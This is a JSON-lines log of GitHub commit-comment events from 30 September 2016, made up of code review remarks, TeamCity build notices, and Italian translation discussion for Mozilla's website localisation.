{"id":"4644127624","type":"CommitCommentEvent","actor":{"login":"loup99"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19242799,"position":null,"line":null,"path":null,"commit_id":"4e1fe49d14de0e635e821c32b311a09e415a4585","created_at":"2016-09-30T15:27:53Z","updated_at":"2016-09-30T15:27:53Z","body":"The text is already neutral in English."}},"created_at":"2016-09-30T15:27:53Z"}
{"id":"4644130368","type":"CommitCommentEvent","actor":{"login":"ethanmick"},"repo":{"name":"dwyl/learn-hapi"},"payload":{"comment":{"id":19242814,"position":null,"line":null,"path":null,"commit_id":"9baac6efea02784a891ffb87e081607fdae56366","created_at":"2016-09-30T15:28:20Z","updated_at":"2016-09-30T15:28:20Z","body":"👍 "}},"created_at":"2016-09-30T15:28:20Z"}
{"id":"4644135408","type":"CommitCommentEvent","actor":{"login":"jinxuanzheng01"},"repo":{"name":"liujians/WeApp"},"payload":{"comment":{"id":19242828,"position":6,"line":29,"path":"app.wxss","commit_id":"6688bfdc04e6637627dade7aee572c7e7e14eaf7","created_at":"2016-09-30T15:29:12Z","updated_at":"2016-09-30T15:29:12Z","body":"ww\r\n"}},"created_at":"2016-09-30T15:29:12Z"}
{"id":"4644137319","type":"CommitCommentEvent","actor":{"login":"MAmelia"},"repo":{"name":"tec-webII-2h11/caio"},"payload":{"comment":{"id":19242830,"position":null,"line":null,"path":null,"commit_id":"4b00c4b0c42fa24dad63e9d5c2335c3dd32f82d2","created_at":"2016-09-30T15:29:32Z","updated_at":"2016-09-30T15:29:32Z","body":"Olá Caio, não esqueça de entregar os arquivos HTML otimizados e o CSS"}},"created_at":"2016-09-30T15:29:32Z"}
{"id":"4644138676","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19242835,"position":null,"line":null,"path":null,"commit_id":"762337430d45285d10b1777efb9c782411160e26","created_at":"2016-09-30T15:29:47Z","updated_at":"2016-09-30T15:29:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1230](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14745&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T15:29:47Z"}
{"id":"4644139676","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19242838,"position":307,"line":430,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:29:58Z","updated_at":"2016-09-30T15:29:58Z","body":"Questa mi ha confuso, volevo quasi quasi tradurla con informativa sulla privacy però poi ho visto che quella è esplicitamente riportata più sotto.\r\n"}},"created_at":"2016-09-30T15:29:58Z"}
{"id":"4644140146","type":"CommitCommentEvent","actor":{"login":"MessyMix"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19242841,"position":null,"line":null,"path":null,"commit_id":"f303fe7c0ab1a76a25a8045314d584bca35ea214","created_at":"2016-09-30T15:30:03Z","updated_at":"2016-09-30T15:30:03Z","body":"Are the Nanobots still supposed to belong to the Mereti faction? Because this change eliminates that aspect of this. If this ambiguity is intended, then sure, but I kind of liked the fact that the Nanobots had a particular faction affiliation. Like \"Mereti Nanobots\" would be cool imo."}},"created_at":"2016-09-30T15:30:03Z"}
{"id":"4644141502","type":"CommitCommentEvent","actor":{"login":"wjoel"},"repo":{"name":"wjoel/mesos-journald-container-logger"},"payload":{"comment":{"id":19242844,"position":96,"line":96,"path":"src/journald_container_logger.cpp","commit_id":"6e4e16008aa35b3f7a6d8725b7724fb353eab3a7","created_at":"2016-09-30T15:30:16Z","updated_at":"2016-09-30T15:30:16Z","body":"Woops, thanks for pointing that out. I'll try to get around to fixing that this weekend."}},"created_at":"2016-09-30T15:30:16Z"}
{"id":"4644144734","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19242849,"position":null,"line":null,"path":null,"commit_id":"f4989bce38fe30bbc5814d001d257b833b919e74","created_at":"2016-09-30T15:30:48Z","updated_at":"2016-09-30T15:30:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1231](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14747&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T15:30:48Z"}
{"id":"4644145351","type":"CommitCommentEvent","actor":{"login":"awikkerink"},"repo":{"name":"Brightspace/d2l-numeric-pager-ui"},"payload":{"comment":{"id":19242850,"position":null,"line":null,"path":null,"commit_id":"da80ea74146992dd675e715ed2c82cbebefaa956","created_at":"2016-09-30T15:30:55Z","updated_at":"2016-09-30T15:30:55Z","body":"It would be better to have the wct-config only in the test directory, so that the globals are not accidentally used"}},"created_at":"2016-09-30T15:30:55Z"}
{"id":"4644150163","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19242862,"position":5,"line":61,"path":"src/mods/chat.js","commit_id":"eb092083c2a83c7993c99092ceae44cf03561e77","created_at":"2016-09-30T15:31:45Z","updated_at":"2016-09-30T15:31:45Z","body":"this is not a text to be translated - this is a value send to the server"}},"created_at":"2016-09-30T15:31:45Z"}
{"id":"4644150652","type":"CommitCommentEvent","actor":{"login":"siro20"},"repo":{"name":"iXit/Mesa-3D"},"payload":{"comment":{"id":19242865,"position":27,"line":2913,"path":"src/gallium/state_trackers/nine/device9.c","commit_id":"401b7880e69de0e0b7666a5a9b12c66bdda12785","created_at":"2016-09-30T15:31:49Z","updated_at":"2016-09-30T15:31:49Z","body":"I made some tests and it always returns d3d_ok I guess, can't find it in the backlog"}},"created_at":"2016-09-30T15:31:49Z"}
{"id":"4644154218","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19242873,"position":14,"line":21,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:32:25Z","updated_at":"2016-09-30T15:32:25Z","body":"Non so, secondo me è troppo ruffiana (vedi anche quella successiva). Avevo messo Sei una bella persona, però davvero mi sembrava troppo.\r\n"}},"created_at":"2016-09-30T15:32:25Z"}
{"id":"4644157481","type":"CommitCommentEvent","actor":{"login":"haroldwongms"},"repo":{"name":"haroldwongms/azure-quickstart-templates"},"payload":{"comment":{"id":19242885,"position":null,"line":null,"path":null,"commit_id":"050cce6dcc534ab7a287363134295a0a4c93148f","created_at":"2016-09-30T15:33:00Z","updated_at":"2016-09-30T15:33:00Z","body":"If you execute: azure group deployment create -h, you will see the correct options.\r\n-f or --template-file points to the azuredeploy.json file.  \r\n\r\nAlso, my fork of the OpenShift Origin Quickstart template is currently ahead of the master since my PR has not been merged yet.  If you are looking to use mine anyways, you will need to change the _artifactsLocation paramenter to be: https://raw.githubusercontent.com/haroldwongms/azure-quickstart-templates/master/openshift-origin-rhel/"}},"created_at":"2016-09-30T15:33:00Z"}
{"id":"4644160392","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19242892,"position":null,"line":null,"path":null,"commit_id":"762337430d45285d10b1777efb9c782411160e26","created_at":"2016-09-30T15:33:29Z","updated_at":"2016-09-30T15:33:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1232](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14748&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T15:33:29Z"}
{"id":"4644160516","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19242893,"position":null,"line":null,"path":null,"commit_id":"59cf396f7be65c4e5384efd563ea30cd7fa673a3","created_at":"2016-09-30T15:33:30Z","updated_at":"2016-09-30T15:33:30Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1229](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14742&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:11:08"}},"created_at":"2016-09-30T15:33:30Z"}
{"id":"4644161378","type":"CommitCommentEvent","actor":{"login":"jbsky"},"repo":{"name":"jbsky/McDebian"},"payload":{"comment":{"id":19242894,"position":null,"line":null,"path":null,"commit_id":"cdb6478a1bf432a91bf23b7f8bb2c2731aa6aa22","created_at":"2016-09-30T15:33:38Z","updated_at":"2016-09-30T15:33:38Z","body":"WPS not tested. \r\n\r\nYou need to make a script for a reset event as I don't know what do you want exactly."}},"created_at":"2016-09-30T15:33:38Z"}
{"id":"4644161748","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19242895,"position":null,"line":null,"path":null,"commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:33:42Z","updated_at":"2016-09-30T15:33:42Z","body":"/cc @kitsunenosaraT "}},"created_at":"2016-09-30T15:33:42Z"}
{"id":"4644164034","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19242897,"position":50,"line":439,"path":"src/mods/chat.js","commit_id":"eb092083c2a83c7993c99092ceae44cf03561e77","created_at":"2016-09-30T15:34:06Z","updated_at":"2016-09-30T15:34:06Z","body":"these are used as css-classes, changing them by language would require us to provide language specific css-files as well - or increase the size by a large amount."}},"created_at":"2016-09-30T15:34:06Z"}
{"id":"4644166161","type":"CommitCommentEvent","actor":{"login":"zenithtekla"},"repo":{"name":"zenithtekla/nodeMySQL"},"payload":{"comment":{"id":19242902,"position":null,"line":null,"path":null,"commit_id":"d14da994942a6fe497a6b510aa1996bf7525d211","created_at":"2016-09-30T15:34:27Z","updated_at":"2016-09-30T15:34:27Z","body":"http://anoopmd.github.io/brunch-example-compile-sass/"}},"created_at":"2016-09-30T15:34:27Z"}
{"id":"4644169546","type":"CommitCommentEvent","actor":{"login":"Ardenian"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19242913,"position":5,"line":61,"path":"src/mods/chat.js","commit_id":"eb092083c2a83c7993c99092ceae44cf03561e77","created_at":"2016-09-30T15:35:02Z","updated_at":"2016-09-30T15:35:02Z","body":"Aight, going to reset it. I assume it behaves as well for all labels and ranks everywhere"}},"created_at":"2016-09-30T15:35:02Z"}
{"id":"4644169708","type":"CommitCommentEvent","actor":{"login":"dhermes"},"repo":{"name":"GoogleCloudPlatform/google-cloud-python"},"payload":{"comment":{"id":19242916,"position":3,"line":82,"path":"datastore/unit_tests/test_query.py","commit_id":"39083d12750d39dea4d1c06bc96b94cbdeedc621","created_at":"2016-09-30T15:35:04Z","updated_at":"2016-09-30T15:35:04Z","body":"@vikkyrk You missed one"}},"created_at":"2016-09-30T15:35:04Z"}
{"id":"4644171779","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19242921,"position":19,"line":25,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:35:25Z","updated_at":"2016-09-30T15:35:25Z","body":"E non lo diciamo solo perché ti sei fidato…"}},"created_at":"2016-09-30T15:35:25Z"}
{"id":"4644174816","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19242929,"position":22,"line":21,"path":"it/mozorg/home/index-2016.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:35:55Z","updated_at":"2016-09-30T15:35:55Z","body":"Qui non si era giunti a una conclusione, quindi ho scelto vitale per healty e rimesso aperto."}},"created_at":"2016-09-30T15:35:55Z"}
{"id":"4644180030","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19242949,"position":14,"line":21,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:36:45Z","updated_at":"2016-09-30T15:36:45Z","body":"Condivido, però si perde un po' il filo del discorso. Possibili alternative: \"Sei il nostro eroe\", \"Sei un grande\", ecc."}},"created_at":"2016-09-30T15:36:45Z"}
{"id":"4644180629","type":"CommitCommentEvent","actor":{"login":"jakobson82"},"repo":{"name":"jakobson82/Python-beginners.-Iniciantes-"},"payload":{"comment":{"id":19242952,"position":7,"line":0,"path":"at01.py","commit_id":"da058b5d72cd5a37318f78ff3d28ac03567207f8","created_at":"2016-09-30T15:36:51Z","updated_at":"2016-09-30T15:36:51Z","body":"Calculo de valores.\nSomo vai receber 4 valored e soma - los"}},"created_at":"2016-09-30T15:36:51Z"}
{"id":"4644181462","type":"CommitCommentEvent","actor":{"login":"johanronkko"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":19242956,"position":39,"line":33,"path":"Vidly/Controllers/MoviesController.cs","commit_id":"acb8c0a0a27255e3f0af85ab2f687e0e9b82b6db","created_at":"2016-09-30T15:36:59Z","updated_at":"2016-09-30T15:36:59Z","body":"Check to see if the appropriate namespace is implemented."}},"created_at":"2016-09-30T15:36:59Z"}
{"id":"4644183295","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19242960,"position":29,"line":33,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:37:17Z","updated_at":"2016-09-30T15:37:17Z","body":"diversi, svariati"}},"created_at":"2016-09-30T15:37:17Z"}
{"id":"4644185272","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19242962,"position":32,"line":29,"path":"it/mozorg/home/index-2016.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:37:37Z","updated_at":"2016-09-30T15:37:37Z","body":"Non è il suggerimento di Francesco, però ho scelto base militante per grassroots invece di persone e asociazioni.\r\n"}},"created_at":"2016-09-30T15:37:37Z"}
{"id":"4644186162","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19242964,"position":null,"line":null,"path":null,"commit_id":"236c0aedf793d28d7a8b4600892bcbf241757d97","created_at":"2016-09-30T15:37:46Z","updated_at":"2016-09-30T15:37:46Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 151](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1271&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-30T15:37:46Z"}
{"id":"4644189904","type":"CommitCommentEvent","actor":{"login":"nkgwj"},"repo":{"name":"sf-arte/Spica"},"payload":{"comment":{"id":19242980,"position":80,"line":80,"path":"Spica/Flickr.swift","commit_id":"1b5584869f242c4100d5d1cc9381dea838dd4760","created_at":"2016-09-30T15:38:25Z","updated_at":"2016-09-30T15:38:25Z","body":"ForLocationのLocationとはlatitude、longitudeにかかっているのでしょうか。\r\n\r\nlatitudeやlongitudeは組で使われるものなのでCoordinatesのようなsturctを作ってまとめてしまい、\r\ngetPhotos(where coordinates: Coordinates, ~) のようにしてしまうのはいかがでしょう\r\n\r\n参考：\r\nhttp://d.hatena.ne.jp/asakichy/20100914/1284424269"}},"created_at":"2016-09-30T15:38:25Z"}
{"id":"4644190257","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19242982,"position":247,"line":374,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:38:28Z","updated_at":"2016-09-30T15:38:28Z","body":"relativi alla"}},"created_at":"2016-09-30T15:38:28Z"}
{"id":"4644191309","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19242993,"position":34,"line":37,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:38:39Z","updated_at":"2016-09-30T15:38:39Z","body":"Io l'ho lasciato, però e il tuo cuore io lo segherei via.\r\n"}},"created_at":"2016-09-30T15:38:39Z"}
{"id":"4644191374","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19242994,"position":null,"line":null,"path":null,"commit_id":"236c0aedf793d28d7a8b4600892bcbf241757d97","created_at":"2016-09-30T15:38:39Z","updated_at":"2016-09-30T15:38:39Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 151](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1271&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:53"}},"created_at":"2016-09-30T15:38:39Z"}
{"id":"4644191803","type":"CommitCommentEvent","actor":{"login":"nerdyrasa"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":19242997,"position":null,"line":null,"path":null,"commit_id":"e5b994581931a079ad87418ddcf9338e808bd821","created_at":"2016-09-30T15:38:43Z","updated_at":"2016-09-30T15:38:43Z","body":"I noticed this too. It makes sense because if you don't get passed the client side validation you do not proceed to the server validation. The validation summary is a server side thing."}},"created_at":"2016-09-30T15:38:43Z"}
{"id":"4644192034","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19242999,"position":256,"line":382,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:38:46Z","updated_at":"2016-09-30T15:38:46Z","body":"Ti abbiamo inviato… ?"}},"created_at":"2016-09-30T15:38:46Z"}
{"id":"4644194247","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19243008,"position":null,"line":null,"path":null,"commit_id":"be66c84532f0498bd874e648be23c982a53e6193","created_at":"2016-09-30T15:39:09Z","updated_at":"2016-09-30T15:39:09Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 152](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1272&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) is now running\n"}},"created_at":"2016-09-30T15:39:09Z"}
{"id":"4644196116","type":"CommitCommentEvent","actor":{"login":"superna9999"},"repo":{"name":"jeromebrunet/linux"},"payload":{"comment":{"id":19243014,"position":26,"line":316,"path":"arch/arm64/boot/dts/amlogic/meson-gxbb.dtsi","commit_id":"ee5b5b480834ed5c979da82b975d74fe0f41cd66","created_at":"2016-09-30T15:39:27Z","updated_at":"2016-09-30T15:39:27Z","body":"I suppose gpio bank would be more coherent"}},"created_at":"2016-09-30T15:39:27Z"}
{"id":"4644196364","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19243015,"position":307,"line":430,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:39:29Z","updated_at":"2016-09-30T15:39:29Z","body":"Lasciamo informativa sulla privacy, sono gli inglesi a doverla differenziare."}},"created_at":"2016-09-30T15:39:29Z"}
{"id":"4644197453","type":"CommitCommentEvent","actor":{"login":"bjustin-ibm"},"repo":{"name":"openwhisk/openwhisk"},"payload":{"comment":{"id":19243018,"position":53,"line":144,"path":"core/nodejsActionBase/src/service.js","commit_id":"6bf62df64b1364b8f198d048f7167a204b2f4e63","created_at":"2016-09-30T15:39:41Z","updated_at":"2016-09-30T15:39:41Z","body":"`doInit` currently only has one caller, so changing the return type from a `boolean` to a Promise for a response message only affects the `initCode` function."}},"created_at":"2016-09-30T15:39:41Z"}
{"id":"4644197714","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimWindowsUI"},"payload":{"comment":{"id":19243019,"position":null,"line":null,"path":null,"commit_id":"be66c84532f0498bd874e648be23c982a53e6193","created_at":"2016-09-30T15:39:43Z","updated_at":"2016-09-30T15:39:43Z","body":"TeamCity Xbim :: Xbim Windows UI :: Xbim Windows UI [Build 152](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1272&buildTypeId=Xbim_XbimWindowsUi_XbimWindowsUi) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:35"}},"created_at":"2016-09-30T15:39:43Z"}
{"id":"4644198198","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19243021,"position":4,"line":72,"path":"core/src/test/java/io/grpc/internal/ClientCallImplTest.java","commit_id":"664c7edbe102648ecb653933cf5fb6469c4470c6","created_at":"2016-09-30T15:39:47Z","updated_at":"2016-09-30T15:39:47Z","body":"fix import"}},"created_at":"2016-09-30T15:39:47Z"}
{"id":"4644198641","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19243023,"position":321,"line":455,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:39:51Z","updated_at":"2016-09-30T15:39:51Z","body":"è in manutenzione"}},"created_at":"2016-09-30T15:39:51Z"}
{"id":"4644198950","type":"CommitCommentEvent","actor":{"login":"carl-j-love"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19243025,"position":null,"line":null,"path":null,"commit_id":"af52f5c030fedf31c13eb5270510198c617aab9a","created_at":"2016-09-30T15:39:54Z","updated_at":"2016-09-30T15:39:54Z","body":"Both print and lprint have special meaning when used inside userinfo. They\nare essentially format codes. `print` means prettyprint, and lprint means\nstart a new line. This is documented at ?userinfo. I've come up with some\nvery powerful applications of `print` inside userinfo.\n\nOn Fri, Sep 30, 2016 at 8:31 AM, Jacques Carette <notifications@github.com>\nwrote:\n\n> I don't think it is a good idea to put a print in a userinfo: that is\n> essentially double-printing.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hakaru-dev/hakaru/commit/af52f5c030fedf31c13eb5270510198c617aab9a#commitcomment-19240205>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASYo9dsgWopsjz0KTFG3lU5GJZnRsZwzks5qvQE3gaJpZM4KLCYx>\n> .\n>\n"}},"created_at":"2016-09-30T15:39:54Z"}
{"id":"4644199876","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19243028,"position":4,"line":40,"path":"core/src/test/java/io/grpc/internal/ConnectivityStateManagerTest.java","commit_id":"664c7edbe102648ecb653933cf5fb6469c4470c6","created_at":"2016-09-30T15:40:03Z","updated_at":"2016-09-30T15:40:03Z","body":"fix import"}},"created_at":"2016-09-30T15:40:03Z"}
{"id":"4644200596","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19243029,"position":4,"line":54,"path":"core/src/test/java/io/grpc/internal/DelayedClientTransportTest.java","commit_id":"664c7edbe102648ecb653933cf5fb6469c4470c6","created_at":"2016-09-30T15:40:12Z","updated_at":"2016-09-30T15:40:12Z","body":"fix import"}},"created_at":"2016-09-30T15:40:12Z"}
{"id":"4644201592","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19243033,"position":4,"line":51,"path":"core/src/test/java/io/grpc/internal/DnsNameResolverTest.java","commit_id":"664c7edbe102648ecb653933cf5fb6469c4470c6","created_at":"2016-09-30T15:40:21Z","updated_at":"2016-09-30T15:40:21Z","body":"fix import"}},"created_at":"2016-09-30T15:40:21Z"}
{"id":"4644201697","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19243034,"position":null,"line":null,"path":null,"commit_id":"762337430d45285d10b1777efb9c782411160e26","created_at":"2016-09-30T15:40:22Z","updated_at":"2016-09-30T15:40:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1230](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14745&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:10:35"}},"created_at":"2016-09-30T15:40:22Z"}
{"id":"4644201953","type":"CommitCommentEvent","actor":{"login":"Tuuleh"},"repo":{"name":"SumOfUs/Champaign"},"payload":{"comment":{"id":19243035,"position":2,"line":2,"path":"app/services/auth_token_verifier.rb","commit_id":"c147ac6652f3cab2b2acafcf2873172ba65c5477","created_at":"2016-09-30T15:40:25Z","updated_at":"2016-09-30T15:40:25Z","body":"OK, I think that makes sense. But I think it's a little unreasonable to basically rewrite the entire class, changing all of its logic and taking things out despite of the fact that it worked perfectly fine. I find that really demoralizing."}},"created_at":"2016-09-30T15:40:25Z"}
{"id":"4644202163","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19243036,"position":4,"line":70,"path":"core/src/test/java/io/grpc/internal/ManagedChannelImplIdlenessTest.java","commit_id":"664c7edbe102648ecb653933cf5fb6469c4470c6","created_at":"2016-09-30T15:40:27Z","updated_at":"2016-09-30T15:40:27Z","body":"fix import"}},"created_at":"2016-09-30T15:40:27Z"}
{"id":"4644202766","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19243040,"position":4,"line":82,"path":"core/src/test/java/io/grpc/internal/ManagedChannelImplTest.java","commit_id":"664c7edbe102648ecb653933cf5fb6469c4470c6","created_at":"2016-09-30T15:40:33Z","updated_at":"2016-09-30T15:40:33Z","body":"fix import"}},"created_at":"2016-09-30T15:40:33Z"}
{"id":"4644203459","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19243044,"position":4,"line":62,"path":"core/src/test/java/io/grpc/internal/TransportSetTest.java","commit_id":"664c7edbe102648ecb653933cf5fb6469c4470c6","created_at":"2016-09-30T15:40:42Z","updated_at":"2016-09-30T15:40:42Z","body":"fix import"}},"created_at":"2016-09-30T15:40:42Z"}
{"id":"4644205458","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19243050,"position":459,"line":579,"path":"it/mozorg/newsletters.lang","commit_id":"44b108f75ace9382b861b9ce1dec5dd7ae4c8bfe","created_at":"2016-09-30T15:41:03Z","updated_at":"2016-09-30T15:41:03Z","body":"alla creazione e all'insegnamento?"}},"created_at":"2016-09-30T15:41:03Z"}
{"id":"4644210669","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19243066,"position":null,"line":null,"path":null,"commit_id":"f4989bce38fe30bbc5814d001d257b833b919e74","created_at":"2016-09-30T15:41:57Z","updated_at":"2016-09-30T15:41:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1231](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14747&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 259, ignored: 3 Build time: 00:11:08"}},"created_at":"2016-09-30T15:41:57Z"}
{"id":"4644210675","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19243067,"position":null,"line":null,"path":null,"commit_id":"66ec62150396c61f12e2fdd13adacdbf902b73cf","created_at":"2016-09-30T15:41:57Z","updated_at":"2016-09-30T15:41:57Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1233](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14751&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T15:41:57Z"}
{"id":"4644211954","type":"CommitCommentEvent","actor":{"login":"Chadster766"},"repo":{"name":"jbsky/McDebian"},"payload":{"comment":{"id":19243073,"position":null,"line":null,"path":null,"commit_id":"cdb6478a1bf432a91bf23b7f8bb2c2731aa6aa22","created_at":"2016-09-30T15:42:10Z","updated_at":"2016-09-30T15:42:10Z","body":"Ok I can test the WPS."}},"created_at":"2016-09-30T15:42:10Z"}
